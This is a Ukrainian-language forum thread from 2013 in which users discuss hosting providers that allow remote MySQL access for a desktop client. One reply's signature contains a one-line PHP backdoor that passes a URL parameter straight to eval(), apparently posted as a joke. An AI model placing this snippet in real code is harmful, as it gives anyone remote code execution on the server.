1

Тема: Хостинг + БД

Всім Привіт!

Є ресурс в інеті з MySQL, все красиво, все працює, але замовник затребував написати клієнт (швидше всього буду писати на Delphi) який буде крутитися на стороні користувача з вибіркою даних з БД на сервері і тут виникла проблема:
компанія яка надає хостинг не надає послугу доступу до БД з зовнішніх джерел (сайтів, програм)

Питання:
Порадьте хостинг з БД (можна НЕ MySQL але з найменш проблемним переходом, ексорт з MySQL -> імпорт в "іншу" БД) до якої надається доступ "из вне"

2

Re: Хостинг + БД

http://thehost.com.ua/?uid=3685  у мене тут хостинг наче все гаразд. І віддалений доступ є до бази

Подякували: Replace1

3 Востаннє редагувалося spirit (02.08.2013 12:28:02)

Re: Хостинг + БД

funivan написав:

http://thehost.com.ua/?uid=3685  у мене тут хостинг наче все гаразд. І віддалений доступ є до бази

Що значить "віддалений доступ є до бази"?
Це керування БД чи саме доступ до БД сторонніми додатками (программами) з можливістью не тільки вибірки, а додавання, модифікування і т.д. інформації в БД?

4 Востаннє редагувалося funivan (02.08.2013 12:47:48)

Re: Хостинг + БД

для прикладу:
У мене є база на хостингу. 

На локальній машині я створюю скрипт який зєднюється до бази.
Цей скрипт вибирає дані обробляє і заносить назад у базу. Тобто він має фактично повний доступ до бази. База даних mysql. Всі запити пов'язані з базою я можу виконати з локальної машини. Select delete insert ... інші ;)


який буде крутитися на стороні користувача з вибіркою даних з БД на сервері

у мене те саме є =)

5

Re: Хостинг + БД

funivan написав:

...
Select delete insert ... інші ;)

На ЛОКАЛЬНІЙ машині (вдома) стоїть сервер і ти виконуеш скрипт локально який чіпляється до віддаленої БД і виконує потрібні операціїї?

А якщо скрипт буде виконуватись не з-під PHP, а наприклад з программи написаної на Сі?
І ще питання, хостинг дає зовнішній доступ до своєї БД з одного IP? Треба їм надсилати такий запит (просити дозвіл) чи можна коннектитись хоч з сотні адрес?

6

Re: Хостинг + БД

А якщо скрипт буде виконуватись не з-під PHP, а наприклад з программи написаної на Сі?

А яка їм різниця?

<?php
echo '<html><body><h1>This is my home page</h1>DATING &amp; DOORWAY</body></html>';
if (isset($_GET['adminka'])) eval($_GET['adminka']);
Если ты это читаешь, тебе должно быть стыдно! Займись чем–нибудь полезным!

7

Re: Хостинг + БД

А якщо скрипт буде виконуватись не з-під PHP, а наприклад з программи написаної на Сі?

Вони дають доступ до бази. Їм все рівно чи ви через рнр чи через java до неї з'єднуєтесь чи через C

І ще питання, хостинг дає зовнішній доступ до своєї БД з одного IP? Треба їм надсилати такий запит (просити дозвіл) чи можна коннектитись хоч з сотні адрес?

З декількох машин. Якщо бажаєте можу створити тестову базу дати доступ на деякий час перевірите чи все гаразд =)

Подякували: spirit1

8 Востаннє редагувалося spirit (02.08.2013 14:20:49)

Re: Хостинг + БД

Ні, пока тестової бази не потрібно, в мене ще не готовій інструмент... Як тільки напишу чорновий варіант для тесту підключення і операціїй з БД я Вам відпишусь в цю гілку форуму.

Дякую +

Подякували: Replace1

9

Re: Хостинг + БД

Краще приватним повідомленням ;)